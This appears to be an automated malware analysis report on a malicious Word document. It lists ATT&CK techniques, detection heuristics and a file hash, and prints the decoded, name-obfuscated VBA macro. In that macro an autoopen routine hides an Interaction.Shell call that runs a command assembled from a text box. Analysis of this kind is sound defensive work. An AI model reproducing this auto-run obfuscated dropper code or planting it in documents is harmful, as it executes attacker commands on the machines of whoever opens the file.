Verdict: MALICIOUS
Risk Score: 292
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 Malicious File
The sample contains a VBA macro with an autoopen subroutine that utilizes the Shell() function to execute commands. This indicates an attempt to download and execute a secondary payload. The presence of multiple high-severity heuristics related to VBA macros and command execution, along with a critical ClamAV detection, strongly suggests malicious intent.
Heuristics (10)
- ClamAV: Doc.Malware.Generic-6781940-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Generic-6781940-0
- VBA macros detected (medium, OLE_VBA_MACROS; 3 related findings): Document contains VBA macro code
- Potential Shell call in VBA (critical, OLE_VBA_SHELL): Potential Shell call in VBA. Matched line in script: `_ .Shell(YXiOXia, NYpjntCoqoQ), Fosnfh) Set wvhJIUdocdjrYVQUYaTv = TUmPZqHqssSZvHqWEijhd`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script: `Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox" Sub autoopen() izjvG`
- Suspicious cmd.exe invocation with execution flag (high, SC_STR_CMD)
- Reference to PowerShell (high, SC_STR_POWERSHELL)
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7696 bytes |

SHA-256: c894a1a0acc85eb518da5427ff359b04c647298334750e2e1a305e4a1465cc03

Detection (ClamAV): No threats found

Obfuscation or payload: likely. 198 of 243 identifiers look randomly generated (e.g. 'jfElELfDGbYmfrDuQkhaXDFh'), consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script)

```vba
Attribute VB_Name = "wGcKOWAGn"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
izjvG
End Sub
Attribute VB_Name = "fHJMNDOi"
Function izjvG()
On Error Resume Next
Set jfLTTLwNZEhLdHAn = GZOqRJlpGdfTGtNAd
brUzzRasYOcwqujzNXwUP = Sqr(adMhTuSLTKzWZvwJbw)
YlWNJnkjGfqEIVFQq = 243576335 * Oct(zfZNuRzUVnDEvzErk) * 30469940 * CuiKLfdFrBTiFYKwk - (335181560 + CLng(bvMTPvDbuFDdUMaiWP) * 138156564 * CBool(90548992))
RMGSBJzjkAUsNdUqbSOIE = ChrW(AnXzSfpojPlpKjGANmGuJ)
Set TrNAURSoihkToXWfupEPz = wJwJhGOtNhcRfAoTIjAitUE
koRsWvaJibuEDKk = Sqr(akUCqWrVrahXPVwb)
qZspVXSHTjDFkPz = 314045371 * Oct(EJABQNzvBvOCuNdTwNlsWE) * 82902020 * vXnnQGKjcaQpbD - (171159991 + CLng(vtUbEEZWamlBMDSz) * 320153305 * CBool(333952184))
saJfuliaUwnsvnZ = ChrW(cklzrwRMiVIWYIRscwhllOZq)
Set UriDUJPOIKHstCi = bNrOvVtjNGLIaHJTEpZvibqS
ZwAovKLJhCVYGMz = Sqr(wqOzGnBBnoEciRzWZGVYsrSw)
zsEnvwcazjlcUAmvzBHFjaQD = 338649456 * Oct(zqaEGXRzHvwOspbBlkOtEFjd) * 300515657 * LqQZbBnwwlAsZNKXtrwkJR - (199532607 + CLng(ojoFutGzLQMbhiTvavqpB) * 295786888 * CBool(71028781))
ihMsfIhtMikvMi = ChrW(EfChIBjpLYCKNa)
Set OBORctusitHzvbERcABRYQ = hYktdNoMTLWzJjGlzwjGmmj
rwQwklLQzHjtrARfph = Sqr(oYbvkWOCUrKHuoNBjzqciz)
CBzNtziAQEwvzPB = 206828708 * Oct(VjqYmAmEiwlizFFoSZu) * 246499969 * VCpqtCvsQlfROGz - (62002580 + CLng(PANIPBtSRztHiqGtSzjAh) * 296641018 * CBool(333781451))
LNMGQkwFikJuYBFBwYcCCll = ChrW(YXvHTIzWBWwBonBjBncujMV)
Const NYpjntCoqoQ = 0
Set qqbGAinvUjsRjAR = uHAFMwLOttjbCdfWRccIl
EUmZrlFqfmIMmoDhrr = Sqr(MMGwLtrDWADYJzZCjSnH)
ICOwTqqrSjkkdZJwVbj = 342012449 * Oct(jqcOzONmXOEkEDJsCsDAM) * 26008018 * SnjYQDKrHHtZMliUb - (194891365 + CLng(uUjAYVzFTjczUfY) * 66779658 * CBool(173946543))
pwiNXzcLdwGTYbXHJw = ChrW(nHCQwrIiIYunbHBlhXhwj)
Set pjJIonijmsDzvdVpKdDtnCr = QEHjHqwzqihjwD
jjZcBuoZjODLQiUEms = Sqr(rjfvbwwFJQvpqHK)
JNaqGbfaVEffPVZuop = 77587638 * Oct(DowjEofIkZMEGNKqMCCQE) * 33318560 * WRRqoqBAAvaRVPulRvW - (274479855 + CLng(saYCKjhmnvfwObOnwrSjYLJf) * 319433884 * CBool(270437090))
SQkUhPdiqsndHTONzuS = ChrW(nfwSEEGXjRtFVIO)
Set tUTNqRvmVuZQkCWr = dwRuhmUhdpEODqND
UqiQXWJDkKIGpUiQjjCoP = Sqr(hzfMbqXRELMDifIt)
bIqzcLboVWzWKLP = 122016805 * Oct(JilLuSjSGwtmlCH) * 255208161 * bfYOFnDXGUZutAzkZWa - (53560829 + CLng(jpKfVPiCjTqkkkjtuDuioozG) * 153614133 * CBool(85630678))
vBMfhiiuqOjjYUUWBjKJQOqf = ChrW(fZHssDHITmBXoIFFp)
Set BnMiREZJuTnoLmiubWXPcSki = pncJwbqjqowPRkLVB
fDJRujdkjzaWjChRbQ = Sqr(zzszHVzhfKlLtbwEaHYtwfMv)
GUFthAJuZBVnGBvzwwZvlju = 237648544 * Oct(HJDXATlzEBArowJcRUZdRTFc) * 318126973 * hmzGZZVvZrFXZijqCAvFKzQS - (137887529 + CLng(VGjoDbaClzzzcbVs) * 166468032 * CBool(120350456))
turtbQFhqmiVhlMEPP = ChrW(niwWwktFXTkSawwbRdNEX)
Set WLQjdvvFfAUwES = pHkRCAFRZQcjWEffBsz
CYDiLzCzsnAZVMdzubfDRt = Sqr(QBOZBzVTEGiWRDBFFwHYlQD)
JailZMuWJjnhwYBw = 156971557 * Oct(wTqpMusWaFJUFAwEPa) * 111699772 * trMINkQUIjzIBSTjTTOot - (21821158 + CLng(oMoamjsIahoaEGicbdXNtI) * 7603666 * CBool(129194157))
jOkwMcpqFXvYJdlQYWbMrO = ChrW(lrmKWpsjLUnGUIMOEwjz)
Set mzsBKdFIYEhOrwNcGiN = aviCRCKVvvijpX
PItHsvrzhYniWWLKodrwrV = Sqr(kHSjNcWAZUGzTNWUHivwdi)
ozjktCzYwuSJzZLiWL = 158119991 * Oct(NQYrzRIjPvYNFnik) * 196340864 * czbwHDBDXuvDYkFQGXarncu - (95548365 + CLng(CVFDLvbAiiamRIV) * 276409035 * CBool(301387050))
NnMXnIphGJmEADMnFhwzLzU = ChrW(uCfdoPEBtijawf)
Set LzhOKYjSqPQrGVidpaMbJqp = IfmifwuWThbWupa
lHokiDWijhaNZMkUHaFilA = Sqr(sUuXZtIiAAYpCBEYEJDCzY)
zHwHOUjvClTwQojwpYwZM = 6885673 * Oct(iSDBAVhzpUmwQcmtOR) * 33029961 * EiFojYMOiwzUwkOoLS - (226808791 + CLng(UoicdrPUDfkHHiSzNOS) * 185513120 * CBool(60776034))
SrUSAfOwhwjfBQEdLr = ChrW(sLzOrMRSOazzGQA)
Set HnCwUDmzMiOQwondp = IBDRVISUIiipcLSFdDXDfiu
pJFCJOWjaOrzOqSt = Sqr(AuDTXCDwtKkFmNaHqbLD)
KtLvPNUUqnkiZfnqt = 121670757 * Oct(CEQDldoBQqXPGqO) * 276360464 * rXIoiiDXzaMinQ - (324492233 + CLng(DALupaRaMDdSXdo) * 75844005 * CBool(273799564))
zWKSTaMjlCbSdaaGDpCvLR = ChrW(hciAkzVmBsAQawk)
Set usKFcYwZTzttJHqqfY = avGkcjwUbhbCapm
QHIZErIQGEwYnzBTBij = Sqr(oHiVdDXrsvSDWjajWzA)
mqiYlahdjHBwFMjIYnwAU = 113398643 * Oct(LlvBDXRzBiBnzdKkDWt) * 74349333 * tWwKzRLjCzNVRTmpYdGOK - (340274415 + CLng(EZmfOCtibFnRPwrDF) * 44210092 * CBool(93483134))
inRfKYuismzatEukNmzjJVmP = ChrW(BWthaBHvAnQHGVpIPloI)
YXiOXia = wGcKOWAGn.TextBox1 + CGpSJ + IBBBIBBw + pitQddH + XukzG + KqbkizN + OFEMoGS + qKVhCrQ + SjivY + BCKvYEv + PXCFTRc
Set DoBdtnLOoVhlnm = FKwLcVPcFsJsVVdhKiKiqz
IjtFBAKRHwOawOObio = Sqr(vlkuqtKoXHcDwHpn)
iQNcuaBvGuhSvCctiBj = 157122868 * Oct(DLqLnKfsQSGantSajBKjzj) * 333304541 * WbEAJTGFPmfEWRHQWDqc - (177673162 + CLng(IJJTvAZopTNNpLGfizMALAN) * 93465283 * CBool(25591506))
tuNvtWCiTuqqYGjbz = ChrW(rJbwJqUsQajIwvPc)
Set XVVfftMPDFHrXlMKwzADQ = WCYGfiGdfFtwXN
nbRuobVljHjjBVfEISW = Sqr(SHZOiIaZCzbNzmJYjJcZARsz)
uEHABldBNFjBDMfBwiifWkO = 79488146 * Oct(VzpwzBOZTnESZBM) * 328037631 * lhdWfzzYEiJTYKpv - (302847046 + CLng(lnFODRbjYaiWhWhKzhij) * 270329301 * CBool(12603590))
YvSFGucOXfVaJGWdMuwYWph = ChrW(mlOLIMKrkvhTlL)
Set awFTtAKiGAWiGJd = LWQmBKEYccHTjAUAfjn
zYHYwzEiTHkDhIuUELF = Sqr(uhrQtquFfWCWWCcmO)
qDGZFUsDmaGAwUiXjQjqiFD = 331454593 * Oct(zFNhijHFMVCJUcXYpETzfZhs) * 332327971 * MGYNkAIbIPiWHuzujz - (184398550 + CLng(LoJSoBjwSXXViIUBh) * 333356708 * CBool(238524387))
BtTHuTzZAkqiQj = ChrW(XwGZjQJIlsInwazN)
Set BXDWpZYhjHfFjsiDjiwY = wDWJRABjXIhQZtWjMqXswqFd
zZBboTEShFThMYYWBIzzpJzL = Sqr(UoZjAFzsKRbzEipczr)
DCASwVuhGfJpapHTffljzV = 263683322 * Oct(GzWwZJUsRKIRUW) * 176422638 * FYrNAcAJwPKzLKph - (96346932 + CLng(LBwwHwLRXPhqzJEabbibCdwN) * 341801901 * CBool(71728252))
XjHVbCWKZMHQuBiFlcGPBtkj = ChrW(CnviElwwznkQtFnd)
Set JpsmjYCWJlKrnLViUNZJvPYH = GAwRcbESzEIwFq
jfElELfDGbYmfrDuQkhaXDFh = Sqr(GYpGMmPXiaPKmDsb)
rpDpYatKsLXPYfaXbwmpwtpJ = 94746045 * Oct(RnjdhowaLPiUhw) * 313121133 * UarIGupnLEFlAwAtaXJGaOii - (111214586 + CLng(TLsGQouzZOSGvWwvScjNZNOk) * 301236082 * CBool(69143885))
pVGwIrIbivEoRrAYlbUbnH = ChrW(vBzDXFwINGzEiTSJPnvU)
Set lIvFSZkjMjMtQdGTkz = WwZslTzjwWBGDWGJq
tlMQPEYmILqDlLF = Sqr(CYMQJlTsoMKZIXKTPOqO)
GhUUzLnqslqAXU = 223168801 * Oct(awISTbCuwdlBWoXVrdvrrvJa) * 209430085 * wbUZlCcWoRivii - (200677290 + CLng(VWZlTDNVItYqFfnhmQf) * 180928554 * CBool(172392084))
siZAAFmvvQNRamAujsN = ChrW(QrilQJiAJRzCzvirMSDIiNwH)
Set mYiMjwaUqTVZsXKPzJJG = ifGmzSUtFVttiWJ
cYUcYfpIflvGUOfPiVEtc = Sqr(idFalwbfNBBhVkpiiCp)
GMXOZqpiOIRPFCprWwurjAYt = 35032393 * Oct(tuaAnCDiTWGrBuIzQEkmbS) * 309213901 * IkHwRGndIlzuEOVPLbjSkiwA - (227963813 + CLng(kTJTLbAcsCuEMNidjPwNt) * 10690809 * CBool(228235971))
aAibNioHQjVTTpaWuc = ChrW(TVHOWkHvjEUoilosKs)
oSVZoc = Array(ZiBhq, uJnkV, mriRmWFS, Interaction _
_
_
_
_
_
_
_
.Shell(YXiOXia, NYpjntCoqoQ), Fosnfh)
Set wvhJIUdocdjrYVQUYaTv = TUmPZqHqssSZvHqWEijhd
FQDtIVzdrqMziavujdVwkk = Sqr(RcNawTvkNEjPWMfim)
PBbNzcPbKuFLfCUBmQuuzJv = 37105403 * Oct(twKZiEviFUjmDfkKWIAfCZdv) * 135567511 * PnrtFFVPEiECcqJcail - (97879011 + CLng(lJkcBuawTUPEIoHrLOdQn) * 172661110 * CBool(41400810))
UjKVZwvJFrdiHQE = ChrW(vTkKozUBBlOTHwvL)
End Function
```